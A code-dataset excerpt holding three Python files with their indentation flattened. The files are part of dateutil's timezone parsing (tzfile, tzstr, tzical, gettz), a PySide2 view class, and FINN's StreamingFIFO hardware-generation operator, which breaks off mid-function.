# The above header is followed by tzh_timecnt four-byte
# values of type long, sorted in ascending order.
# These values are written in ``standard'' byte order.
# Each is used as a transition time (as returned by
# time(2)) at which the rules for computing local time
# change.
if timecnt:
self._trans_list = struct.unpack(">%dl" % timecnt,
fileobj.read(timecnt*4))
else:
self._trans_list = []
# Next come tzh_timecnt one-byte values of type unsigned
# char; each one tells which of the different types of
# ``local time'' types described in the file is associated
# with the same-indexed transition time. These values
# serve as indices into an array of ttinfo structures that
# appears next in the file.
if timecnt:
self._trans_idx = struct.unpack(">%dB" % timecnt,
fileobj.read(timecnt))
else:
self._trans_idx = []
# Each ttinfo structure is written as a four-byte value
# for tt_gmtoff of type long, in a standard byte
# order, followed by a one-byte value for tt_isdst
# and a one-byte value for tt_abbrind. In each
# structure, tt_gmtoff gives the number of
# seconds to be added to UTC, tt_isdst tells whether
# tm_isdst should be set by localtime(3), and
# tt_abbrind serves as an index into the array of
# time zone abbreviation characters that follow the
# ttinfo structure(s) in the file.
ttinfo = []
for i in range(typecnt):
ttinfo.append(struct.unpack(">lbb", fileobj.read(6)))
abbr = fileobj.read(charcnt).decode()
# Then there are tzh_leapcnt pairs of four-byte
# values, written in standard byte order; the
# first value of each pair gives the time (as
# returned by time(2)) at which a leap second
# occurs; the second gives the total number of
# leap seconds to be applied after the given time.
# The pairs of values are sorted in ascending order
# by time.
# Not used, for now
if leapcnt:
leap = struct.unpack(">%dl" % (leapcnt*2),
fileobj.read(leapcnt*8))
# Then there are tzh_ttisstdcnt standard/wall
# indicators, each stored as a one-byte value;
# they tell whether the transition times associated
# with local time types were specified as standard
# time or wall clock time, and are used when
# a time zone file is used in handling POSIX-style
# time zone environment variables.
if ttisstdcnt:
isstd = struct.unpack(">%db" % ttisstdcnt,
fileobj.read(ttisstdcnt))
# Finally, there are tzh_ttisgmtcnt UTC/local
# indicators, each stored as a one-byte value;
# they tell whether the transition times associated
# with local time types were specified as UTC or
# local time, and are used when a time zone file
# is used in handling POSIX-style time zone envi-
# ronment variables.
if ttisgmtcnt:
isgmt = struct.unpack(">%db" % ttisgmtcnt,
fileobj.read(ttisgmtcnt))
# ** Everything has been read **
# Build ttinfo list
self._ttinfo_list = []
for i in range(typecnt):
gmtoff, isdst, abbrind = ttinfo[i]
# Round to full-minutes if that's not the case. Python's
# datetime doesn't accept sub-minute timezones. Check
# http://python.org/sf/1447945 for some information.
gmtoff = (gmtoff+30)//60*60
tti = _ttinfo()
tti.offset = gmtoff
tti.delta = datetime.timedelta(seconds=gmtoff)
tti.isdst = isdst
tti.abbr = abbr[abbrind:abbr.find('\x00', abbrind)]
tti.isstd = (ttisstdcnt > i and isstd[i] != 0)
tti.isgmt = (ttisgmtcnt > i and isgmt[i] != 0)
self._ttinfo_list.append(tti)
# Replace ttinfo indexes for ttinfo objects.
trans_idx = []
for idx in self._trans_idx:
trans_idx.append(self._ttinfo_list[idx])
self._trans_idx = tuple(trans_idx)
# Set standard, dst, and before ttinfos. before will be
# used when a given time is before any transitions,
# and will be set to the first non-dst ttinfo, or to
# the first dst, if all of them are dst.
self._ttinfo_std = None
self._ttinfo_dst = None
self._ttinfo_before = None
if self._ttinfo_list:
if not self._trans_list:
self._ttinfo_std = self._ttinfo_first = self._ttinfo_list[0]
else:
for i in range(timecnt-1, -1, -1):
tti = self._trans_idx[i]
if not self._ttinfo_std and not tti.isdst:
self._ttinfo_std = tti
elif not self._ttinfo_dst and tti.isdst:
self._ttinfo_dst = tti
if self._ttinfo_std and self._ttinfo_dst:
break
else:
if self._ttinfo_dst and not self._ttinfo_std:
self._ttinfo_std = self._ttinfo_dst
for tti in self._ttinfo_list:
if not tti.isdst:
self._ttinfo_before = tti
break
else:
self._ttinfo_before = self._ttinfo_list[0]
# Now fix transition times to become relative to wall time.
#
# I'm not sure about this. In my tests, the tz source file
# is setup to wall time, and in the binary file isstd and
# isgmt are off, so it should be in wall time. OTOH, it's
# always in gmt time. Let me know if you have comments
# about this.
laststdoffset = 0
self._trans_list = list(self._trans_list)
for i in range(len(self._trans_list)):
tti = self._trans_idx[i]
if not tti.isdst:
# This is std time.
self._trans_list[i] += tti.offset
laststdoffset = tti.offset
else:
# This is dst time. Convert to std.
self._trans_list[i] += laststdoffset
self._trans_list = tuple(self._trans_list)
def _find_ttinfo(self, dt, laststd=0):
timestamp = ((dt.toordinal() - EPOCHORDINAL) * 86400
+ dt.hour * 3600
+ dt.minute * 60
+ dt.second)
idx = 0
for trans in self._trans_list:
if timestamp < trans:
break
idx += 1
else:
return self._ttinfo_std
if idx == 0:
return self._ttinfo_before
if laststd:
while idx > 0:
tti = self._trans_idx[idx-1]
if not tti.isdst:
return tti
idx -= 1
else:
return self._ttinfo_std
else:
return self._trans_idx[idx-1]
def utcoffset(self, dt):
if not self._ttinfo_std:
return ZERO
return self._find_ttinfo(dt).delta
def dst(self, dt):
if not self._ttinfo_dst:
return ZERO
tti = self._find_ttinfo(dt)
if not tti.isdst:
return ZERO
# The documentation says that utcoffset()-dst() must
# be constant for every dt.
return tti.delta-self._find_ttinfo(dt, laststd=1).delta
# An alternative for that would be:
#
# return self._ttinfo_dst.offset-self._ttinfo_std.offset
#
# However, this class stores historical changes in the
# dst offset, so I belive that this wouldn't be the right
# way to implement this.
@tzname_in_python2
def tzname(self, dt):
if not self._ttinfo_std:
return None
return self._find_ttinfo(dt).abbr
def __eq__(self, other):
if not isinstance(other, tzfile):
return False
return (self._trans_list == other._trans_list and
self._trans_idx == other._trans_idx and
self._ttinfo_list == other._ttinfo_list)
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return "%s(%s)" % (self.__class__.__name__, repr(self._filename))
def __reduce__(self):
if not os.path.isfile(self._filename):
raise ValueError("Unpickable %s class" % self.__class__.__name__)
return (self.__class__, (self._filename,))
class tzrange(datetime.tzinfo):
def __init__(self, stdabbr, stdoffset=None,
dstabbr=None, dstoffset=None,
start=None, end=None):
global relativedelta
if not relativedelta:
from dateutil import relativedelta
self._std_abbr = stdabbr
self._dst_abbr = dstabbr
if stdoffset is not None:
self._std_offset = datetime.timedelta(seconds=stdoffset)
else:
self._std_offset = ZERO
if dstoffset is not None:
self._dst_offset = datetime.timedelta(seconds=dstoffset)
elif dstabbr and stdoffset is not None:
self._dst_offset = self._std_offset+datetime.timedelta(hours=+1)
else:
self._dst_offset = ZERO
if dstabbr and start is None:
self._start_delta = relativedelta.relativedelta(
hours=+2, month=4, day=1, weekday=relativedelta.SU(+1))
else:
self._start_delta = start
if dstabbr and end is None:
self._end_delta = relativedelta.relativedelta(
hours=+1, month=10, day=31, weekday=relativedelta.SU(-1))
else:
self._end_delta = end
def utcoffset(self, dt):
if self._isdst(dt):
return self._dst_offset
else:
return self._std_offset
def dst(self, dt):
if self._isdst(dt):
return self._dst_offset-self._std_offset
else:
return ZERO
@tzname_in_python2
def tzname(self, dt):
if self._isdst(dt):
return self._dst_abbr
else:
return self._std_abbr
def _isdst(self, dt):
if not self._start_delta:
return False
year = datetime.datetime(dt.year, 1, 1)
start = year+self._start_delta
end = year+self._end_delta
dt = dt.replace(tzinfo=None)
if start < end:
return dt >= start and dt < end
else:
return dt >= start or dt < end
def __eq__(self, other):
if not isinstance(other, tzrange):
return False
return (self._std_abbr == other._std_abbr and
self._dst_abbr == other._dst_abbr and
self._std_offset == other._std_offset and
self._dst_offset == other._dst_offset and
self._start_delta == other._start_delta and
self._end_delta == other._end_delta)
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return "%s(...)" % self.__class__.__name__
__reduce__ = object.__reduce__
class tzstr(tzrange):
def __init__(self, s):
global parser
if not parser:
from dateutil import parser
self._s = s
res = parser._parsetz(s)
if res is None:
raise ValueError("unknown string format")
# Here we break the compatibility with the TZ variable handling.
# GMT-3 actually *means* the timezone -3.
if res.stdabbr in ("GMT", "UTC"):
res.stdoffset *= -1
# We must initialize it first, since _delta() needs
# _std_offset and _dst_offset set. Use False in start/end
# to avoid building it two times.
tzrange.__init__(self, res.stdabbr, res.stdoffset,
res.dstabbr, res.dstoffset,
start=False, end=False)
if not res.dstabbr:
self._start_delta = None
self._end_delta = None
else:
self._start_delta = self._delta(res.start)
if self._start_delta:
self._end_delta = self._delta(res.end, isend=1)
def _delta(self, x, isend=0):
kwargs = {}
if x.month is not None:
kwargs["month"] = x.month
if x.weekday is not None:
kwargs["weekday"] = relativedelta.weekday(x.weekday, x.week)
if x.week > 0:
kwargs["day"] = 1
else:
kwargs["day"] = 31
elif x.day:
kwargs["day"] = x.day
elif x.yday is not None:
kwargs["yearday"] = x.yday
elif x.jyday is not None:
kwargs["nlyearday"] = x.jyday
if not kwargs:
# Default is to start on first sunday of april, and end
# on last sunday of october.
if not isend:
kwargs["month"] = 4
kwargs["day"] = 1
kwargs["weekday"] = relativedelta.SU(+1)
else:
kwargs["month"] = 10
kwargs["day"] = 31
kwargs["weekday"] = relativedelta.SU(-1)
if x.time is not None:
kwargs["seconds"] = x.time
else:
# Default is 2AM.
kwargs["seconds"] = 7200
if isend:
# Convert to standard time, to follow the documented way
# of working with the extra hour. See the documentation
# of the tzinfo class.
delta = self._dst_offset-self._std_offset
kwargs["seconds"] -= delta.seconds+delta.days*86400
return relativedelta.relativedelta(**kwargs)
def __repr__(self):
return "%s(%s)" % (self.__class__.__name__, repr(self._s))
class _tzicalvtzcomp(object):
def __init__(self, tzoffsetfrom, tzoffsetto, isdst,
tzname=None, rrule=None):
self.tzoffsetfrom = datetime.timedelta(seconds=tzoffsetfrom)
self.tzoffsetto = datetime.timedelta(seconds=tzoffsetto)
self.tzoffsetdiff = self.tzoffsetto-self.tzoffsetfrom
self.isdst = isdst
self.tzname = tzname
self.rrule = rrule
class _tzicalvtz(datetime.tzinfo):
def __init__(self, tzid, comps=[]):
self._tzid = tzid
self._comps = comps
self._cachedate = []
self._cachecomp = []
def _find_comp(self, dt):
if len(self._comps) == 1:
return self._comps[0]
dt = dt.replace(tzinfo=None)
try:
return self._cachecomp[self._cachedate.index(dt)]
except ValueError:
pass
lastcomp = None
lastcompdt = None
for comp in self._comps:
if not comp.isdst:
# Handle the extra hour in DST -> STD
compdt = comp.rrule.before(dt-comp.tzoffsetdiff, inc=True)
else:
compdt = comp.rrule.before(dt, inc=True)
if compdt and (not lastcompdt or lastcompdt < compdt):
lastcompdt = compdt
lastcomp = comp
if not lastcomp:
# RFC says nothing about what to do when a given
# time is before the first onset date. We'll look for the
# first standard component, or the first component, if
# none is found.
for comp in self._comps:
if not comp.isdst:
lastcomp = comp
break
else:
lastcomp = comp[0]
self._cachedate.insert(0, dt)
self._cachecomp.insert(0, lastcomp)
if len(self._cachedate) > 10:
self._cachedate.pop()
self._cachecomp.pop()
return lastcomp
def utcoffset(self, dt):
return self._find_comp(dt).tzoffsetto
def dst(self, dt):
comp = self._find_comp(dt)
if comp.isdst:
return comp.tzoffsetdiff
else:
return ZERO
@tzname_in_python2
def tzname(self, dt):
return self._find_comp(dt).tzname
def __repr__(self):
return "<tzicalvtz %s>" % repr(self._tzid)
__reduce__ = object.__reduce__
class tzical(object):
def __init__(self, fileobj):
global rrule
if not rrule:
from dateutil import rrule
if isinstance(fileobj, string_types):
self._s = fileobj
fileobj = open(fileobj, 'r') # ical should be encoded in UTF-8 with CRLF
elif hasattr(fileobj, "name"):
self._s = fileobj.name
else:
self._s = repr(fileobj)
self._vtz = {}
self._parse_rfc(fileobj.read())
def keys(self):
return list(self._vtz.keys())
def get(self, tzid=None):
if tzid is None:
keys = list(self._vtz.keys())
if len(keys) == 0:
raise ValueError("no timezones defined")
elif len(keys) > 1:
raise ValueError("more than one timezone available")
tzid = keys[0]
return self._vtz.get(tzid)
def _parse_offset(self, s):
s = s.strip()
if not s:
raise ValueError("empty offset")
if s[0] in ('+', '-'):
signal = (-1, +1)[s[0]=='+']
s = s[1:]
else:
signal = +1
if len(s) == 4:
return (int(s[:2])*3600+int(s[2:])*60)*signal
elif len(s) == 6:
return (int(s[:2])*3600+int(s[2:4])*60+int(s[4:]))*signal
else:
raise ValueError("invalid offset: "+s)
def _parse_rfc(self, s):
lines = s.splitlines()
if not lines:
raise ValueError("empty string")
# Unfold
i = 0
while i < len(lines):
line = lines[i].rstrip()
if not line:
del lines[i]
elif i > 0 and line[0] == " ":
lines[i-1] += line[1:]
del lines[i]
else:
i += 1
tzid = None
comps = []
invtz = False
comptype = None
for line in lines:
if not line:
continue
name, value = line.split(':', 1)
parms = name.split(';')
if not parms:
raise ValueError("empty property name")
name = parms[0].upper()
parms = parms[1:]
if invtz:
if name == "BEGIN":
if value in ("STANDARD", "DAYLIGHT"):
# Process component
pass
else:
raise ValueError("unknown component: "+value)
comptype = value
founddtstart = False
tzoffsetfrom = None
tzoffsetto = None
rrulelines = []
tzname = None
elif name == "END":
if value == "VTIMEZONE":
if comptype:
raise ValueError("component not closed: "+comptype)
if not tzid:
raise ValueError("mandatory TZID not found")
if not comps:
raise ValueError("at least one component is needed")
# Process vtimezone
self._vtz[tzid] = _tzicalvtz(tzid, comps)
invtz = False
elif value == comptype:
if not founddtstart:
raise ValueError("mandatory DTSTART not found")
if tzoffsetfrom is None:
raise ValueError("mandatory TZOFFSETFROM not found")
if tzoffsetto is None:
raise ValueError("mandatory TZOFFSETFROM not found")
# Process component
rr = None
if rrulelines:
rr = rrule.rrulestr("\n".join(rrulelines),
compatible=True,
ignoretz=True,
cache=True)
comp = _tzicalvtzcomp(tzoffsetfrom, tzoffsetto,
(comptype == "DAYLIGHT"),
tzname, rr)
comps.append(comp)
comptype = None
else:
raise ValueError("invalid component end: "+value)
elif comptype:
if name == "DTSTART":
rrulelines.append(line)
founddtstart = True
elif name in ("RRULE", "RDATE", "EXRULE", "EXDATE"):
rrulelines.append(line)
elif name == "TZOFFSETFROM":
if parms:
raise ValueError("unsupported %s parm: %s "%(name, parms[0]))
tzoffsetfrom = self._parse_offset(value)
elif name == "TZOFFSETTO":
if parms:
raise ValueError("unsupported TZOFFSETTO parm: "+parms[0])
tzoffsetto = self._parse_offset(value)
elif name == "TZNAME":
if parms:
raise ValueError("unsupported TZNAME parm: "+parms[0])
tzname = value
elif name == "COMMENT":
pass
else:
raise ValueError("unsupported property: "+name)
else:
if name == "TZID":
if parms:
raise ValueError("unsupported TZID parm: "+parms[0])
tzid = value
elif name in ("TZURL", "LAST-MODIFIED", "COMMENT"):
pass
else:
raise ValueError("unsupported property: "+name)
elif name == "BEGIN" and value == "VTIMEZONE":
tzid = None
comps = []
invtz = True
def __repr__(self):
return "%s(%s)" % (self.__class__.__name__, repr(self._s))
if sys.platform != "win32":
TZFILES = ["/etc/localtime", "localtime"]
TZPATHS = ["/usr/share/zoneinfo", "/usr/lib/zoneinfo", "/etc/zoneinfo"]
else:
TZFILES = []
TZPATHS = []
def gettz(name=None):
tz = None
if not name:
try:
name = os.environ["TZ"]
except KeyError:
pass
if name is None or name == ":":
for filepath in TZFILES:
if not os.path.isabs(filepath):
filename = filepath
for path in TZPATHS:
filepath = os.path.join(path, filename)
if os.path.isfile(filepath):
break
else:
continue
if os.path.isfile(filepath):
try:
tz = tzfile(filepath)
break
except (IOError, OSError, ValueError):
pass
else:
tz = tzlocal()
else:
if name.startswith(":"):
name = name[:-1]
if os.path.isabs(name):
if os.path.isfile(name):
tz = tzfile(name)
else:
tz = None
else:
for path in TZPATHS:
filepath = os.path.join(path, name)
if not os.path.isfile(filepath):
filepath = filepath.replace(' ', '_')
if not os.path.isfile(filepath):
continue
try:
tz = tzfile(filepath)
break
except (IOError, OSError, ValueError):
pass
else:
tz = None
if tzwin:
try:
tz = tzwin(name)
except OSError:
pass
if not tz:
from dateutil.zoneinfo import gettz
tz = gettz(name)
if not tz:
for c in name:
# name must have at least one offset to be a tzstr
if c in "0123456789":
try:
tz = tzstr(name)
except ValueError:
pass
break
else:
if name in ("GMT", "UTC"):
tz = tzutc()
elif name in time.tzname:
tz = tzlocal()
return tz
# vim:ts=4:sw=4:et
| 2.828125 | 3 |
example/first_example/window/inputWindow/view.py | suuperhu/Pyside2MVCFramework | 1 | 3308 | # -*- coding: utf-8 -*-
"""
# @SoftwareIDE : PyCharm2020Pro
# @ProjectName : PySide2MVCFramework
# @FileName : view.py
# @Author : 胡守杰
# @Email : <EMAIL>
# @ZhFileDescription :
# @EnFileDescription :
"""
import os
from pyside2mvcframework.core.view import View
from conf.global_settings import BASE_PATH
class InputWindowView(View):
uiFilePath = os.path.join(BASE_PATH, "src\\window\\inputWindow\\inputWindow.ui")
if __name__ == '__main__':
print("unit test from {filename}".format(filename=__file__))
import sys
from PySide2.QtWidgets import QApplication
app = QApplication(sys.argv)
view = InputWindowView().birth()
view.show()
sys.exit(app.exec_())
| 2.078125 | 2 |
src/finn/custom_op/fpgadataflow/streamingfifo.py | AlexMontgomerie/finn | 283 | 3309 | # Copyright (c) 2020, Xilinx
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of FINN nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import numpy as np
from shutil import copy
import subprocess
import math
import warnings
from finn.custom_op.fpgadataflow.hlscustomop import HLSCustomOp
from finn.core.datatype import DataType
from onnx import TensorProto, helper
from finn.util.data_packing import npy_to_rtlsim_input, rtlsim_output_to_npy
from . import templates
class StreamingFIFO(HLSCustomOp):
def __init__(self, onnx_node):
super().__init__(onnx_node)
self.strm_fifo_wrapper = templates.strm_fifo_wrapper
def get_nodeattr_types(self):
my_attrs = {
# FIFO depth
"depth": ("i", True, 0),
# folded shape of input/output
"folded_shape": ("ints", True, []),
# FINN DataTypes for inputs/outputs
"dataType": ("s", True, ""),
# Toggle between hls or IPI implementation
# rtl - use the hls generated IP during stitching
# vivado - use the AXI Infrastructure FIFO
"impl_style": ("s", False, "rtl", {"rtl", "vivado"}),
# FPGA resource type for FIFOs when impl_style is vivado
# auto -- let Vivado decide
# block -- use BRAM
# distributed -- use LUTRAM
# ultra -- use URAM (on UltraScale+)
"ram_style": (
"s",
False,
"auto",
{"auto", "block", "distributed", "ultra"},
),
}
my_attrs.update(super().get_nodeattr_types())
return my_attrs
def make_shape_compatible_op(self, model):
exp_ishape = self.get_normal_input_shape()
oshape = self.get_normal_output_shape()
ishape = tuple(model.get_tensor_shape(self.onnx_node.input[0]))
assert ishape == tuple(exp_ishape), "Unexpect input shape for StreamingFIFO."
# implement tensor with correct shape
values = np.random.randn(*oshape).astype(np.float32)
return helper.make_node(
"Constant",
inputs=[],
outputs=[self.onnx_node.output[0]],
value=helper.make_tensor(
name="const_tensor",
data_type=TensorProto.FLOAT,
dims=values.shape,
vals=values.flatten().astype(float),
),
)
def infer_node_datatype(self, model):
node = self.onnx_node
idt = model.get_tensor_datatype(node.input[0])
if idt != self.get_input_datatype():
warn_str = "inputDataType changing for %s: %s -> %s " % (
node.name,
str(self.get_input_datatype()),
str(idt),
)
warnings.warn(warn_str)
self.set_nodeattr("dataType", idt.name)
# data type stays the same
model.set_tensor_datatype(node.output[0], idt)
def verify_node(self):
pass
def get_verilog_top_module_name(self):
"Return the Verilog top module name for this node."
node = self.onnx_node
prefixed_top_name = "%s" % (node.name)
return prefixed_top_name
def code_generation_ipgen(self, model, fpgapart, clk):
code_gen_dir = self.get_nodeattr("code_gen_dir_ipgen")
verilog_dir = "{}/project_{}/sol1/impl/verilog".format(
code_gen_dir, self.onnx_node.name
)
os.makedirs(verilog_dir)
# copy Q_srl.v from finn-rtllib to verilog directory
memstream_dir = "/workspace/finn/finn-rtllib/memstream/hdl/"
Q_file = os.path.join(memstream_dir, "Q_srl.v")
copy(Q_file, verilog_dir)
# empty code gen dictionary for new entries
self.code_gen_dict.clear()
self.code_gen_dict["$TOPNAME$"] = ["{}".format(self.onnx_node.name)]
self.code_gen_dict["$LAYER_NAME$"] = [
"{}_{}".format(self.onnx_node.name, self.onnx_node.name)
]
# make instream width a multiple of 8 for axi interface
in_width = self.get_instream_width_padded()
count_width = int(self.get_nodeattr("depth") - 1).bit_length()
self.code_gen_dict["$COUNT_RANGE$"] = ["[{}:0]".format(count_width - 1)]
self.code_gen_dict["$IN_RANGE$"] = ["[{}:0]".format(in_width - 1)]
self.code_gen_dict["$OUT_RANGE$"] = ["[{}:0]".format(in_width - 1)]
self.code_gen_dict["$WIDTH$"] = [str(in_width)]
self.code_gen_dict["$DEPTH$"] = [str(self.get_nodeattr("depth"))]
template = self.strm_fifo_wrapper
for key in self.code_gen_dict:
# transform list into long string separated by '\n'
code_gen_line = "\n".join(self.code_gen_dict[key])
template = template.replace(key, code_gen_line)
f = open(os.path.join(verilog_dir, "{}.v".format(self.onnx_node.name)), "w")
f.write(template)
f.close()
self.code_gen_dict.clear()
def ipgen_singlenode_code(self):
code_gen_dir = self.get_nodeattr("code_gen_dir_ipgen")
verilog_dir = "{}/project_{}/sol1/impl/verilog".format(
code_gen_dir, self.onnx_node.name
)
# prepare the IP packaging tcl template
template = templates.ip_package_tcl
self.code_gen_dict.clear()
self.code_gen_dict["$TOPNAME$"] = ["{}".format(self.onnx_node.name)]
# note: setting the root dir as absolute can cause path problems
# the ipgen script will be invoked from the sources dir so root_dir=. is OK
self.code_gen_dict["$VERILOG_DIR$"] = ["."]
for key in self.code_gen_dict:
# transform list into long string separated by '\n'
code_gen_line = "\n".join(self.code_gen_dict[key])
template = template.replace(key, code_gen_line)
f = open(os.path.join(verilog_dir, "package_ip.tcl"), "w")
f.write(template)
f.close()
# create a shell script and call Vivado to invoke the IP pkg script
make_project_sh = verilog_dir + "/make_ip.sh"
working_dir = os.environ["PWD"]
with open(make_project_sh, "w") as f:
f.write("#!/bin/bash \n")
f.write("cd {}\n".format(verilog_dir))
f.write("vivado -mode batch -source package_ip.tcl\n")
f.write("cd {}\n".format(working_dir))
bash_command = ["bash", make_project_sh]
process_compile = subprocess.Popen(bash_command, stdout=subprocess.PIPE)
process_compile.communicate()
# set ipgen_path and ip_path to point to the new packaged IP
self.set_nodeattr("ipgen_path", verilog_dir)
self.set_nodeattr("ip_path", verilog_dir)
vlnv = "xilinx.com:hls:%s:1.0" % (self.onnx_node.name)
self.set_nodeattr("ip_vlnv", vlnv)
self.code_gen_dict.clear()
def get_normal_input_shape(self):
depth = self.get_nodeattr("depth")
# depth has to be between 2 and 256 with the current
# StreamingFIFO implementation
assert depth >= 2, """Depth is too low"""
if depth > 256 and self.get_nodeattr("impl_style") == "rtl":
warnings.warn(
"Depth is high, set between 2 and 256 for efficient SRL implementation"
)
# derive normal shape from folded shape
# StreamingFIFOs are inserted in between fpgadataflow nodes
# the folded shape could be for example (1, nf, pe)
# with nf (neuron folding): mh // pe
# the normal input shape is in this case (1, mh)
# so to achieve this the two inner dimensions are multiplied
# and together with all previous dimensions
# this gives the normal input shape
folded_shape = self.get_nodeattr("folded_shape")
# extract inner dimension
inner_dim = folded_shape[-1]
# multiply with the next inner dimension
folding_factor = folded_shape[-2] * inner_dim
normal_ishape = []
# create the normal_ishape
for i in range(len(folded_shape) - 2):
normal_ishape.append(folded_shape[i])
normal_ishape.append(folding_factor)
return normal_ishape
def get_normal_output_shape(self):
return self.get_normal_input_shape()
def get_folded_input_shape(self):
return self.get_nodeattr("folded_shape")
def get_folded_output_shape(self):
return self.get_nodeattr("folded_shape")
def get_instream_width(self):
dtype = DataType[self.get_nodeattr("dataType")]
folded_shape = self.get_nodeattr("folded_shape")
in_width = folded_shape[-1] * dtype.bitwidth()
return in_width
def get_outstream_width(self):
dtype = DataType[self.get_nodeattr("dataType")]
folded_shape = self.get_nodeattr("folded_shape")
in_width = folded_shape[-1] * dtype.bitwidth()
return in_width
def execute_node(self, context, graph):
mode = self.get_nodeattr("exec_mode")
node = self.onnx_node
inp = context[node.input[0]]
exp_shape = self.get_normal_input_shape()
if mode == "cppsim":
output = inp
output = np.asarray([output], dtype=np.float32).reshape(*exp_shape)
context[node.output[0]] = output
elif mode == "rtlsim":
code_gen_dir = self.get_nodeattr("code_gen_dir_ipgen")
# create a npy file for the input of the node
assert (
str(inp.dtype) == "float32"
), """Input datatype is
not float32 as expected."""
expected_inp_shape = self.get_folded_input_shape()
reshaped_input = inp.reshape(expected_inp_shape)
if DataType[self.get_nodeattr("dataType")] == DataType.BIPOLAR:
# store bipolar activations as binary
reshaped_input = (reshaped_input + 1) / 2
export_idt = DataType.BINARY
else:
export_idt = DataType[self.get_nodeattr("dataType")]
# make copy before saving the array
reshaped_input = reshaped_input.copy()
np.save(os.path.join(code_gen_dir, "input_0.npy"), reshaped_input)
sim = self.get_rtlsim()
nbits = self.get_instream_width()
inp = npy_to_rtlsim_input(
"{}/input_0.npy".format(code_gen_dir), export_idt, nbits
)
super().reset_rtlsim(sim)
super().toggle_clk(sim)
output = self.rtlsim(sim, inp)
odt = DataType[self.get_nodeattr("dataType")]
target_bits = odt.bitwidth()
packed_bits = self.get_outstream_width()
out_npy_path = "{}/output.npy".format(code_gen_dir)
out_shape = self.get_folded_output_shape()
rtlsim_output_to_npy(
output, out_npy_path, odt, out_shape, packed_bits, target_bits
)
# load and reshape output
output = np.load(out_npy_path)
oshape = self.get_normal_output_shape()
output = np.asarray([output], dtype=np.float32).reshape(*oshape)
context[node.output[0]] = output
else:
raise Exception(
"""Invalid value for attribute exec_mode! Is currently set to: {}
has to be set to one of the following value ("cppsim", "rtlsim")""".format(
mode
)
)
def get_number_output_values(self):
folded_oshape = self.get_folded_output_shape()
return np.prod(folded_oshape[:-1])
def global_includes(self):
pass
def defines(self, var):
pass
def read_npy_data(self):
pass
def strm_decl(self):
pass
def docompute(self):
pass
def dataoutstrm(self):
pass
def save_as_npy(self):
pass
def blackboxfunction(self):
pass
def pragmas(self):
pass
def code_generation_ipi(self):
impl_style = self.get_nodeattr("impl_style")
if impl_style == "rtl":
return super().code_generation_ipi()
elif impl_style == "vivado":
cmd = []
node_name = self.onnx_node.name
depth = self.get_nodeattr("depth")
ram_style = self.get_nodeattr("ram_style")
# create a hierarchy for this layer, with the same port names
clk_name = self.get_verilog_top_module_intf_names()["clk"][0]
rst_name = self.get_verilog_top_module_intf_names()["rst"][0]
dout_name = self.get_verilog_top_module_intf_names()["m_axis"][0][0]
din_name = self.get_verilog_top_module_intf_names()["s_axis"][0][0]
cmd.append("create_bd_cell -type hier %s" % node_name)
cmd.append("create_bd_pin -dir I -type clk /%s/%s" % (node_name, clk_name))
cmd.append("create_bd_pin -dir I -type rst /%s/%s" % (node_name, rst_name))
cmd.append(
"create_bd_intf_pin -mode Master "
"-vlnv xilinx.com:interface:axis_rtl:1.0 /%s/%s"
% (node_name, dout_name)
)
cmd.append(
"create_bd_intf_pin -mode Slave "
"-vlnv xilinx.com:interface:axis_rtl:1.0 /%s/%s" % (node_name, din_name)
)
# instantiate and configure DWC
cmd.append(
"create_bd_cell -type ip "
"-vlnv xilinx.com:ip:axis_data_fifo:2.0 /%s/fifo" % node_name
)
cmd.append(
"set_property -dict [list CONFIG.FIFO_DEPTH {%d}] "
"[get_bd_cells /%s/fifo]" % (depth, node_name)
)
cmd.append(
"set_property -dict [list CONFIG.FIFO_MEMORY_TYPE {%s}] "
"[get_bd_cells /%s/fifo]" % (ram_style, node_name)
)
cmd.append(
"set_property -dict [list CONFIG.TDATA_NUM_BYTES {%d}] "
"[get_bd_cells /%s/fifo]"
% (np.ceil(self.get_outstream_width() / 8), node_name)
)
cmd.append(
"connect_bd_intf_net [get_bd_intf_pins %s/fifo/M_AXIS] "
"[get_bd_intf_pins %s/%s]" % (node_name, node_name, dout_name)
)
cmd.append(
"connect_bd_intf_net [get_bd_intf_pins %s/fifo/S_AXIS] "
"[get_bd_intf_pins %s/%s]" % (node_name, node_name, din_name)
)
cmd.append(
"connect_bd_net [get_bd_pins %s/%s] "
"[get_bd_pins %s/fifo/s_axis_aresetn]"
% (node_name, rst_name, node_name)
)
cmd.append(
"connect_bd_net [get_bd_pins %s/%s] "
"[get_bd_pins %s/fifo/s_axis_aclk]" % (node_name, clk_name, node_name)
)
return cmd
else:
raise Exception(
"FIFO implementation style %s not supported, please use rtl or vivado"
% impl_style
)
def bram_estimation(self):
"""Calculates resource estimation for BRAM"""
impl = self.get_nodeattr("impl_style")
ram_type = self.get_nodeattr("ram_style")
depth = self.get_nodeattr("depth")
W = self.get_instream_width()
if impl == "rtl" or (impl == "vivado" and ram_type != "block"):
# Non-BRAM based implementation
return 0
if W == 1:
return math.ceil(depth / 16384)
elif W == 2:
return math.ceil(depth / 8192)
elif W <= 4:
